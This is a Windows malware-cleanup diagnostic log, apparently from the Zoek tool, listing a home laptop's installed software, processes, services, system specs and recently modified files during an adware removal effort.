Photo Gallery  
PhotoPad Image Editor  
Pixillion Image Converter  
Security Update for Microsoft .NET Framework 4.5.1 (KB2894854v2)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2972107)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2972216)  
Security Update for Microsoft .NET Framework 4.5.1 (KB2979578v2)  
SkypeT 6.11  
Spotify  
Starbound  
Steam  
Switch Sound File Converter  
swMSM  
VLC media player  
WavePad Sound Editor  
Windows Live Communications Platform  
Windows Live Essentials  
Windows Live ID Sign-in Assistant  
Windows Live Installer  
Windows Live Photo Common  
Windows Live PIMT Platform  
Windows Live SOXE  
Windows Live SOXE Definitions  
Windows Live UX Platform  
Windows Live UX Platform Language Pack  
WinZip 18.5  
 
==== Running Processes ======================
 
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe
C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Microsoft Office\OFFICE11\OUTLOOK.EXE
C:\Program Files (x86)\Microsoft Office\OFFICE11\WINWORD.EXE
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\Mitey Fresh\Desktop\zoek.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\sysWow64\SearchProtocolHost.exe
 
==== Services (whitelist) ======================
Powered by E Dev
 
R2 - [AdobeARMservice] - Adobe Acrobat Update Service - "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
R2 - [MSCamSvc] - MSCamSvc - "C:\Program Files\Microsoft LifeCam\MSCamS64.exe"
R2 - [MsMpSvc] - Microsoft Antimalware Service - "C:\Program Files\Microsoft Security Client\MsMpEng.exe"
R2 - [wlidsvc] - Windows Live ID Sign-in Assistant - "C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE"
R2 - [WMPNetworkSvc] - Windows Media Player Network Sharing Service - "C:\Program Files\Windows Media Player\wmpnetwk.exe"
R2 - [WSearch] - Windows Search - C:\Windows\system32\SearchIndexer.exe /Embedding
R3 - [VSS] - Volume Shadow Copy - C:\Windows\system32\vssvc.exe
S2 - [clr_optimization_v4.0.30319_32] - Microsoft .NET Framework NGEN v4.0.30319_X86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
S2 - [clr_optimization_v4.0.30319_64] - Microsoft .NET Framework NGEN v4.0.30319_X64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
S2 - [gupdate] - Google Update Service (gupdate) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
S2 - [SkypeUpdate] - Skype Updater - "C:\Program Files (x86)\Skype\Updater\Updater.exe"
S2 - [sppsvc] - Software Protection - C:\Windows\system32\sppsvc.exe
S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash Player Update Service - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
S3 - [ALG] - Application Layer Gateway Service - C:\Windows\System32\alg.exe
S3 - [aspnet_state] - ASP.NET State Service - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
S3 - [COMSysApp] - COM+ System Application - C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
S3 - [ehRecvr] - Windows Media Center Receiver Service - C:\Windows\ehome\ehRecvr.exe
S3 - [ehSched] - Windows Media Center Scheduler Service - C:\Windows\ehome\ehsched.exe
S3 - [Fax] - Fax - C:\Windows\system32\fxssvc.exe
S3 - [FontCache3.0.0.0] - Windows Presentation Foundation Font Cache 3.0.0.0 - C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
S3 - [gupdatem] - Google Update Service (gupdatem) - "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
S3 - [IEEtwCollectorService] - Internet Explorer ETW Collector Service - C:\Windows\system32\IEEtwCollector.exe /V
S3 - [MozillaMaintenance] - Mozilla Maintenance Service - "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
S3 - [MSDTC] - Distributed Transaction Coordinator - C:\Windows\System32\msdtc.exe
S3 - [msiserver] - Windows Installer - C:\Windows\system32\msiexec.exe /V
S3 - [NisSrv] - Microsoft Network Inspection - "C:\Program Files\Microsoft Security Client\NisSrv.exe"
S3 - [ose] - Office Source Engine - "C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
S3 - [PerfHost] - Performance Counter DLL Host - C:\Windows\SysWow64\perfhost.exe
S3 - [RpcLocator] - Remote Procedure Call (RPC) Locator - C:\Windows\system32\locator.exe
S3 - [SNMPTRAP] - SNMP Trap - C:\Windows\System32\snmptrap.exe
S3 - [Steam Client Service] - Steam Client Service - "C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService
S3 - [TrustedInstaller] - Windows Modules Installer - C:\Windows\servicing\TrustedInstaller.exe
S3 - [vds] - Virtual Disk - C:\Windows\System32\vds.exe
S3 - [WatAdminSvc] - Windows Activation Technologies Service - C:\Windows\system32\Wat\WatAdminSvc.exe
S3 - [wbengine] - Block Level Backup Engine Service - "C:\Windows\system32\wbengine.exe"
S3 - [wmiApSrv] - WMI Performance Adapter - C:\Windows\system32\wbem\WmiApSrv.exe
S4 - [clr_optimization_v2.0.50727_32] - Microsoft .NET Framework NGEN v2.0.50727_X86 - C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
S4 - [clr_optimization_v2.0.50727_64] - Microsoft .NET Framework NGEN v2.0.50727_X64 - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 
==== System Specs ======================
 
Windows: Windows 7 Home Premium Edition (64-bit) Service Pack 1 (Build 7601)
Memory (RAM): 3887 MB
CPU Info: Intel® Pentium® CPU        P6100  @ 2.00GHz
CPU Speed: 1994.6 MHz
Sound Card: Speakers (2- High Definition Au | 
Display Adapters: Intel® HD Graphics | Intel® HD Graphics | RDPDD Chained DD | RDP Encoder Mirror Driver | RDP Reflector Display Driver
Monitors: 1x; Generic PnP Monitor | 
Screen Resolution: 1366 X 768 - 32 bit
Network: Network Present
Network Adapters: Atheros AR9285 Wireless Network Adapter | Realtek RTL8102E/RTL8103E Family PCI-E Fast Ethernet NIC (NDIS 6.20) | Hamachi Network Interface
CD / DVD Drives: 2x (E: | H: | ) E: TSSTcorpCDDVDW TS-L633C  | H: DTSOFT  BDROM
Ports: COM Ports NOT Present. LPT Port NOT Present. 
Mouse: 5 Button Wheel Mouse Present
Hard Disks: C:  273.4GB | D:  180.3GB
Hard Disks - Free: C:  115.3GB | D:  117.5GB
Manufacturer *: American Megatrends Inc.
BIOS Info: AT/AT COMPATIBLE | 09/07/10 | MSI_NB - 6222004
Time Zone: AUS Eastern Standard Time
Motherboard *: Micro-Star International A6200
Country: Australia 
Language: ENA 
 
==== System Specs (Software) ======================
 
Anti-Virus: Microsoft Security Essentials On-access scanning disabled (Outdated)
Anti-Spyware: Microsoft Security Essentials disabled (Outdated)
Anti-Spyware: Windows Defender disabled (Outdated)
Default Browser: Google Chrome 33.0.1750.117
Internet Explorer Version: 11.0.9600.17358 
Mozilla Firefox version: 28.0 (x86 en-US)
Google Chrome version: 33.0.1750.117
Adobe Reader version: 11.0.07.79
Sun Java version: 1.7.0_65 (32-bit) 
Sun Java version: 1.7.0_17 (64-bit) 
Flash Player version: 15.0.0.152
Shockwave Player version: 12.0r112
 
==== Files Recently Created / Modified ======================
 
====== C:\Windows ====
====== C:\Users\MITEYF~1\AppData\Local\Temp ====
2014-10-16 02:28:39 E0DC8C6BBC787B972A9A468648DBFD85 1008128 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\libiconv2.dll
2014-10-16 02:28:39 D202BAA425176287017FFE1FB5D1B77C 103424 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\libintl3.dll
2014-10-16 02:28:39 57CAC848FA14AE38F14F9441F8933282 140288 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\pcre3.dll
2014-10-16 02:28:39 547C43567AB8C08EB30F6C6BACB479A3 79360 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\regex2.dll
2014-10-16 02:28:39 2E0323A94915FAAB10A25F3BABF82584 157696 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\erunt\ERUNT.EXE
2014-10-12 16:54:48 E17B30D3B06DBC63E9E94DAE70290A35 787968 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\sqlite3.dll
====== Java Cache =====
====== C:\Windows\SysWOW64 =====
2014-10-15 02:08:39 DF59F2510EDABBF216FA837D5D964106 51200 ----a-w- C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-15 02:08:39 BD66BA5A924DCC8392CFAEB67131A246 597504 ----a-w- C:\Windows\SysWOW64\jscript9diag.dll
2014-10-15 02:08:39 604C67F58747D6A333EA641BCCC2C842 32768 ----a-w- C:\Windows\SysWOW64\iernonce.dll
2014-10-15 02:08:39 201EAFA3F17BE4990999C28657212D8E 69632 ----a-w- C:\Windows\SysWOW64\mshtmled.dll
2014-10-15 02:08:38 D78C4DB153874DB7AC6AA6A03BE38B66 331448 ----a-w- C:\Windows\SysWOW64\iedkcs32.dll
2014-10-15 02:08:38 97F2F82BF0B4AF86A85FFDD78DFDC87D 60416 ----a-w- C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 02:08:38 3065FF6794A7FDC882F0DA8B6230AB6E 1190400 ----a-w- C:\Windows\SysWOW64\urlmon.dll
2014-10-15 02:08:37 F91E55DA404B834648A3B0A2477C10DB 17484800 ----a-w- C:\Windows\SysWOW64\mshtml.dll
2014-10-15 02:08:37 B89F5D2B3D3BC730FAB93CFCD931742F 607744 ----a-w- C:\Windows\SysWOW64\msfeeds.dll
2014-10-15 02:08:37 B5B1C277E46A5B0E2FC63E5FC5624CE5 365056 ----a-w- C:\Windows\SysWOW64\dxtmsft.dll
2014-10-15 02:08:35 58EC068116BCE16A94B1B2C429A35E41 2724864 ----a-w- C:\Windows\SysWOW64\mshtml.tlb
2014-10-15 02:08:34 8FAA1E45198C4ECEC691326B7F5E71C5 61952 ----a-w- C:\Windows\SysWOW64\iesetup.dll
2014-10-15 02:08:34 835807E2AC0A8FA15B9A2EA80E2D5169 2017280 ----a-w- C:\Windows\SysWOW64\inetcpl.cpl
2014-10-15 02:08:33 B74B348D13134D67B4F68ADDDC76A447 43008 ----a-w- C:\Windows\SysWOW64\jsproxy.dll
2014-10-15 02:08:33 55A400FDB21D157E947A0EE65AEDB1B3 2187264 ----a-w- C:\Windows\SysWOW64\iertutil.dll
2014-10-15 02:08:32 EF94FA1F3D90520CCA4AE65D639A9E62 11807232 ----a-w- C:\Windows\SysWOW64\ieframe.dll
2014-10-15 02:08:32 410BECCA3354D471E45344F0754CC0E4 243200 ----a-w- C:\Windows\SysWOW64\dxtrans.dll
2014-10-15 02:08:32 158690737381C49120165A7F3F5D13EB 440320 ----a-w- C:\Windows\SysWOW64\ieui.dll
2014-10-15 02:08:29 AA103FEAD721863B86A1B1260948E662 112128 ----a-w- C:\Windows\SysWOW64\ieUnatt.exe
2014-10-15 02:08:29 8E8E6E7B4CC27B92F40F74E29C1F6290 1068032 ----a-w- C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-15 02:08:28 FBE852643EDEB9D6D6502AFE6017CD64 678400 ----a-w- C:\Windows\SysWOW64\ieapfltr.dll
2014-10-15 02:08:28 DF4BA130BD41F29A894E026E456B8481 454656 ----a-w- C:\Windows\SysWOW64\vbscript.dll
2014-10-15 02:08:28 D03EB7605435FE24ADE670661A932651 4201472 ----a-w- C:\Windows\SysWOW64\jscript9.dll
2014-10-15 02:08:27 7AE80F921027CF88CB9D0433088A3E55 1810944 ----a-w- C:\Windows\SysWOW64\wininet.dll
2014-10-15 02:08:27 6D4DD5706C297234F457B9D9018C493F 61952 ----a-w- C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-15 02:08:27 2409C41081D657A3FABE3659BB989AFB 164864 ----a-w- C:\Windows\SysWOW64\msrating.dll
2014-10-15 02:07:57 3888D02CE6413C2A06D903DE1C778BF5 2363904 ----a-w- C:\Windows\SysWOW64\msi.dll
2014-10-15 02:07:49 37C395C075E6FA66623C82DE50A8FAED 372736 ----a-w- C:\Windows\SysWOW64\rastls.dll
2014-10-15 02:07:44 3ABACF6D4EBEA5EF3014FEFA1D8FF5F8 3221504 ----a-w- C:\Windows\SysWOW64\mstscax.dll
2014-10-15 02:07:41 0DBD0B4D4766CADEB8C30242A0611395 1051136 ----a-w- C:\Windows\SysWOW64\mstsc.exe
2014-10-15 02:07:40 FD67683FBA9B2C4BB551780BD8846F64 157696 ----a-w- C:\Windows\SysWOW64\winsta.dll
2014-10-15 02:07:39 97896EE4254176CFDD9010B5B243B89F 131584 ----a-w- C:\Windows\SysWOW64\aaclient.dll
2014-10-15 02:07:38 13829161C1297F4170A5546430147BBD 65536 ----a-w- C:\Windows\SysWOW64\TSpkg.dll
2014-10-15 02:07:37 DB1D6751689B4A7EE2439C64F2ADF1C9 17408 ----a-w- C:\Windows\SysWOW64\credssp.dll
2014-10-15 02:07:19 C120855C1133DF8FFD5E0C04A7E70B67 67072 ----a-w- C:\Windows\SysWOW64\packager.dll
====== C:\Windows\SysWOW64\drivers =====
====== C:\Windows\Sysnative =====
2014-10-15 02:08:43 974F83636F841739FEA5CC6219BFB241 276480 ----a-w- C:\Windows\Sysnative\generaltel.dll
2014-10-15 02:08:43 510D5492BCA9E63E10E3CE0285965722 507392 ----a-w- C:\Windows\Sysnative\aepdu.dll
2014-10-15 02:08:41 767D478BB4B2F84B47B3C0956E6A5A05 424448 ----a-w- C:\Windows\Sysnative\aeinv.dll
2014-10-15 02:08:38 C109D5136DF0A6CA668C7AD888AA125F 2724864 ----a-w- C:\Windows\Sysnative\mshtml.tlb
2014-10-15 02:08:38 739D9C9F220CCEDAFD8212C6B976B60D 33792 ----a-w- C:\Windows\Sysnative\iernonce.dll
2014-10-15 02:08:38 29C0530E0F120AC3E583889DCD6A63DD 710656 ----a-w- C:\Windows\Sysnative\ie4uinit.exe
2014-10-15 02:08:37 DD8E9C85F9F428859713055183661956 48640 ----a-w- C:\Windows\Sysnative\ieetwproxystub.dll
2014-10-15 02:08:37 4D21F4FDF57DF86FAD9149ED1C071D15 72704 ----a-w- C:\Windows\Sysnative\JavaScriptCollectionAgent.dll
2014-10-15 02:08:34 87D14AF9A2C3F3D5233B613CFA9C321D 378552 ----a-w- C:\Windows\Sysnative\iedkcs32.dll
2014-10-15 02:08:34 0F5A279522FA6A30C9C5A297A1064933 1447936 ----a-w- C:\Windows\Sysnative\urlmon.dll
2014-10-15 02:08:33 B07E9AFF50DC007E7D5AC54736AA5A25 4096 ----a-w- C:\Windows\Sysnative\ieetwcollectorres.dll
2014-10-15 02:08:32 E9109E91BB8366759822DC2FC9B5DA8B 111616 ----a-w- C:\Windows\Sysnative\ieetwcollector.exe
2014-10-15 02:08:32 DAF317E9F4CEC206D0D443014A427341 446464 ----a-w- C:\Windows\Sysnative\dxtmsft.dll
2014-10-15 02:08:32 45B736E3184B68515FDB71D4083A9BCF 731136 ----a-w- C:\Windows\Sysnative\msfeeds.dll
2014-10-15 02:08:31 0467A4DDA6B2CE8E27A8178BF035BA18 66048 ----a-w- C:\Windows\Sysnative\iesetup.dll
2014-10-15 02:08:30 646C004F58AA4762F92BF7C595216C37 2108416 ----a-w- C:\Windows\Sysnative\inetcpl.cpl
2014-10-15 02:08:30 050FD78BA4EFA62417F61F4C098B5B25 2796032 ----a-w- C:\Windows\Sysnative\iertutil.dll
2014-10-15 02:08:27 BE37AA454460539877420951EEA16EF0 51200 ----a-w- C:\Windows\Sysnative\jsproxy.dll
2014-10-15 02:08:24 98241BE7EB26C41562D33393DD12608F 289280 ----a-w- C:\Windows\Sysnative\dxtrans.dll
2014-10-15 02:08:24 88D2165E07CEDC3F34CBE1A5A807673D 595968 ----a-w- C:\Windows\Sysnative\ieui.dll
2014-10-15 02:08:23 A2105E46DC9CE38A1D57FB124436E1BC 85504 ----a-w- C:\Windows\Sysnative\mshtmled.dll
2014-10-15 02:08:23 7E60EE8A68F7270D1E1662CBA275D4FA 13619200 ----a-w- C:\Windows\Sysnative\ieframe.dll
2014-10-15 02:08:22 F9FA80C1CB6EAC55A7F534937F6AC4E4 139264 ----a-w- C:\Windows\Sysnative\ieUnatt.exe
2014-10-15 02:08:22 DB101A62F9BF8E7765685950169EF52B 758272 ----a-w- C:\Windows\Sysnative\jscript9diag.dll
2014-10-15 02:08:22 D3B07C2FABEAE749E4E51F1E93CABA23 5829632 ----a-w- C:\Windows\Sysnative\jscript9.dll
2014-10-15 02:08:22 70527367E5779C3537992F0768D9C59A 1249280 ----a-w- C:\Windows\Sysnative\mshtmlmedia.dll
2014-10-15 02:08:21 9D98D4F390F0B14A782F3B931E613A1A 2309632 ----a-w- C:\Windows\Sysnative\wininet.dll
2014-10-15 02:08:21 328143D6BC5951E1797BD524C4E98CDC 547328 ----a-w- C:\Windows\Sysnative\vbscript.dll
2014-10-15 02:08:21 2E5AF1507CBE735B4D7EBFF1908EA0E1 775168 ----a-w- C:\Windows\Sysnative\ieapfltr.dll
2014-10-15 02:08:20 30FB9ABB6C45C3299CFA5F556904DD5F 83968 ----a-w- C:\Windows\Sysnative\MshtmlDac.dll
2014-10-15 02:08:19 EB710A3AF29BEC4EE7475A1ED5C575DE 195584 ----a-w- C:\Windows\Sysnative\msrating.dll
2014-10-15 02:08:18 15847E14811FEDDF77E934AF4F0BEF45 940032 ----a-w- C:\Windows\Sysnative\MsSpellCheckingFacility.exe
2014-10-15 02:08:16 7415B29AFE2E4494A57358B8C7E78600 23631360 ----a-w- C:\Windows\Sysnative\mshtml.dll
2014-10-15 02:07:57 ADD3F2C3E6B89BD16D4BFC61B3658DD9 3241472 ----a-w- C:\Windows\Sysnative\msi.dll
2014-10-15 02:07:50 DD7C31F12936795C0516BB6C59CBCCD8 424448 ----a-w- C:\Windows\Sysnative\rastls.dll
2014-10-15 02:07:43 467D0E831D6DF8DA16BF856D0537A153 3722240 ----a-w- C:\Windows\Sysnative\mstscax.dll
2014-10-15 02:07:42 8516703179C3BDE90A3ED31B9EC16F8D 1118720 ----a-w- C:\Windows\Sysnative\mstsc.exe
2014-10-15 02:07:41 4FC4C50985E5B840F4D72E57286887B8 681984 ----a-w- C:\Windows\Sysnative\termsrv.dll
2014-10-15 02:07:40 C23B6D9D16FD86F446BE607CA18389D9 235520 ----a-w- C:\Windows\Sysnative\winsta.dll
2014-10-15 02:07:40 0374D83D003043E7DE33036294A2EFAE 150528 ----a-w- C:\Windows\Sysnative\rdpcorekmts.dll
2014-10-15 02:07:38 85E03B6E05939845BC924C91AEDE0E24 86528 ----a-w- C:\Windows\Sysnative\TSpkg.dll
2014-10-15 02:07:37 560CF90C026C0FE51CC6820302FF94FE 22016 ----a-w- C:\Windows\Sysnative\credssp.dll
2014-10-15 02:07:20 1DB68B8A1E3BDE3C19F1D3612CE436CA 77312 ----a-w- C:\Windows\Sysnative\packager.dll
====== C:\Windows\Sysnative\drivers =====
2014-10-15 02:07:40 FE571E088C2D83619D2D48D4E961BF41 212480 ----a-w- C:\Windows\Sysnative\drivers\rdpwd.sys
2014-10-15 02:07:37 E232A3B43A894BB327FC161529BD9ED1 39936 ----a-w- C:\Windows\Sysnative\drivers\tssecsrv.sys
====== C:\Windows\Tasks ======
====== C:\Windows\Temp ======
======= C:\Program Files =====
2014-10-01 03:50:58 -------- d-----w- C:\Program Files\WinZip
======= C:\PROGRA~2 =====
2014-09-30 06:07:18 -------- d-----w- C:\PROGRA~2\COMMON~1\iSkysoft
2014-09-30 06:06:15 -------- d-----w- C:\PROGRA~2\iSkysoft
2014-09-22 07:46:55 -------- d-----w- C:\PROGRA~2\VLC
======= C: =====
====== C:\Users\Mitey Fresh\AppData\Roaming ======
2014-10-01 03:52:30 -------- d-----w- C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
2014-10-01 03:51:45 -------- d-----w- C:\Users\Mitey Fresh\AppData\Local\WinZip
2014-09-30 06:07:43 -------- d-----w- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
2014-09-30 06:07:24 -------- d-----w- C:\Users\Mitey Fresh\AppData\Local\iSkysoft
2014-09-22 07:48:09 -------- d-----w- C:\Users\Mitey Fresh\AppData\Roaming\vlc
2014-09-16 22:37:48 1036E3DDDC89A4E68D8A33F3823A180E 4 ----a-w- C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
====== C:\Users\Mitey Fresh ======
2014-10-16 02:54:21 3F5D9D75F6523CB30924999EDFDAD28B 1705698 ----a-w- C:\Users\Mitey Fresh\Downloads\JRT (1).exe
2014-10-16 02:29:45 590AE97695A21AE8FA5B419BE3E13452 1976320 ----a-w- C:\Users\Mitey Fresh\Desktop\AdwCleaner (1).exe
2014-10-16 02:28:18 3F5D9D75F6523CB30924999EDFDAD28B 1705698 ----a-w- C:\Users\Mitey Fresh\Desktop\JRT (1).exe
2014-10-15 04:38:34 0D41FFFB6EEFDE929CDDF5EDFCC014BD 2111488 ----a-w- C:\Users\Mitey Fresh\Desktop\FRST64.exe
2014-10-10 01:57:58 4ADCFEE16EE9978F06157634669D36FB 602112 ----a-w- C:\Users\Mitey Fresh\Downloads\OTL.exe
2014-10-01 03:51:50 -------- d-----w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2014-10-01 03:51:08 -------- d-----w- C:\ProgramData\WinZip
2014-09-30 06:07:06 -------- d-----w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
2014-09-30 06:06:27 -------- d-----w- C:\ProgramData\iSkysoft Video Converter Ultimate
2014-09-30 06:06:15 -------- d-----w- C:\ProgramData\iSkysoft
2014-09-30 06:05:20 -------- d-----w- C:\Users\Public\Documents\iSkysoft
 
====== C: exe-files ==
2014-10-16 02:54:21 3F5D9D75F6523CB30924999EDFDAD28B 1705698 ----a-w- C:\Users\Mitey Fresh\Downloads\JRT (1).exe
2014-10-16 02:29:45 590AE97695A21AE8FA5B419BE3E13452 1976320 ----a-w- C:\Users\Mitey Fresh\Desktop\AdwCleaner (1).exe
2014-10-16 02:28:39 2E0323A94915FAAB10A25F3BABF82584 157696 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\erunt\ERUNT.EXE
2014-10-16 02:28:18 3F5D9D75F6523CB30924999EDFDAD28B 1705698 ----a-w- C:\Users\Mitey Fresh\Desktop\JRT (1).exe
2014-10-15 04:38:34 E236574733E2991350F04762209E884E 2110464 ----a-w- C:\Users\Mitey Fresh\Downloads\FRST-OlderVersion\FRST64.exe
2014-10-15 04:38:34 0D41FFFB6EEFDE929CDDF5EDFCC014BD 2111488 ----a-w- C:\Users\Mitey Fresh\Desktop\FRST64.exe
2014-10-15 04:36:53 C21C69EE9BF359CECB05B94293F9E655 1101824 ----a-w- C:\Users\Mitey Fresh\Downloads\FRST-OlderVersion\FRST.exe
2014-10-15 02:08:42 D43F34B4901C499FE13798149879DCD8 161960 ----a-w- C:\Windows\System32\CompatTel\QueryAppBlock.exe
2014-10-15 02:08:42 97EBB8C10D4A6CA575E3D916B25A3BEF 46752 ----a-w- C:\Windows\System32\CompatTel\wicainventory.exe
2014-10-15 02:08:38 6B9FDB34A5A490FF6A7EDE280062626A 810680 ----a-w- C:\Program Files\Internet Explorer\iexplore.exe
2014-10-15 02:08:38 54C9747BB0A64F4D9D401E4648363386 222720 ----a-w- C:\Program Files (x86)\Internet Explorer\ielowutil.exe
2014-10-15 02:08:38 29C0530E0F120AC3E583889DCD6A63DD 710656 ----a-w- C:\Windows\System32\ie4uinit.exe
2014-10-15 02:08:35 F9F310F9FB7F294F00ABDD03453D8CEE 812736 ----a-w- C:\Program Files (x86)\Internet Explorer\iexplore.exe
2014-10-15 02:08:34 649E8F572EC0D929F4EED13A53AC0475 222720 ----a-w- C:\Program Files\Internet Explorer\ielowutil.exe
2014-10-15 02:08:34 53E24F2DB97EFAF85FE093AA254790EC 470528 ----a-w- C:\Program Files (x86)\Internet Explorer\ieinstal.exe
2014-10-15 02:08:32 E9109E91BB8366759822DC2FC9B5DA8B 111616 ----a-w- C:\Windows\System32\ieetwcollector.exe
2014-10-15 02:08:30 C876F8303AA30481A36FE2AACDE77671 483840 ----a-w- C:\Program Files\Internet Explorer\ieinstal.exe
2014-10-15 02:08:29 AA103FEAD721863B86A1B1260948E662 112128 ----a-w- C:\Windows\SysWOW64\ieUnatt.exe
2014-10-15 02:08:22 F9FA80C1CB6EAC55A7F534937F6AC4E4 139264 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-10-15 02:08:18 15847E14811FEDDF77E934AF4F0BEF45 940032 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2014-10-15 02:07:42 8516703179C3BDE90A3ED31B9EC16F8D 1118720 ----a-w- C:\Windows\System32\mstsc.exe
2014-10-15 02:07:41 0DBD0B4D4766CADEB8C30242A0611395 1051136 ----a-w- C:\Windows\SysWOW64\mstsc.exe
2014-10-12 11:10:50 F47DBB47E45D94BFC81B3428C2E66CC5 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\G2MUninstall.exe
2014-10-12 11:10:50 F47DBB47E45D94BFC81B3428C2E66CC5 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\G2MInstHigh.exe
2014-10-12 11:10:50 C6745F35D52B597B86F5D39BD883DCC7 39792 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mui.exe
2014-10-12 11:10:50 675140C8FFCB6E0377634B10B5B1A419 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mvideoconference.exe
2014-10-12 11:10:50 675140C8FFCB6E0377634B10B5B1A419 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe
2014-10-12 11:10:50 675140C8FFCB6E0377634B10B5B1A419 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mtranscoder.exe
2014-10-12 11:10:50 675140C8FFCB6E0377634B10B5B1A419 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mstart.exe
2014-10-12 11:10:50 675140C8FFCB6E0377634B10B5B1A419 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mlauncher.exe
2014-10-12 11:10:50 675140C8FFCB6E0377634B10B5B1A419 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\G2MInstaller.exe
2014-10-12 11:10:50 4287C244F56BBF75D2B5B35BDB518120 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mcomm.exe
2014-10-12 11:10:38 A9ECC1F13A1743DEBD08FCB16BC59550 39792 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1796\g2mui.exe
2014-10-12 11:10:38 651E38D9DF4903FE1337564E8E1F00DD 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1796\g2mvideoconference.exe
2014-10-12 11:10:38 651E38D9DF4903FE1337564E8E1F00DD 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1796\g2mupdate.exe
2014-10-12 11:10:38 651E38D9DF4903FE1337564E8E1F00DD 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1796\g2mtranscoder.exe
2014-10-12 11:10:38 651E38D9DF4903FE1337564E8E1F00DD 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1796\g2mstart.exe
2014-10-12 11:10:38 651E38D9DF4903FE1337564E8E1F00DD 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1796\g2mlauncher.exe
2014-10-12 11:10:38 4A89B56CBA8E04F75DAE971DDABBF229 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1796\g2mcomm.exe
2014-10-12 11:10:37 C38A80559545062BBAD3EBE750361F03 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1796\G2MUninstall.exe
2014-10-12 11:10:37 C38A80559545062BBAD3EBE750361F03 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1796\G2MInstHigh.exe
2014-10-12 11:10:37 651E38D9DF4903FE1337564E8E1F00DD 40304 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1796\G2MInstaller.exe
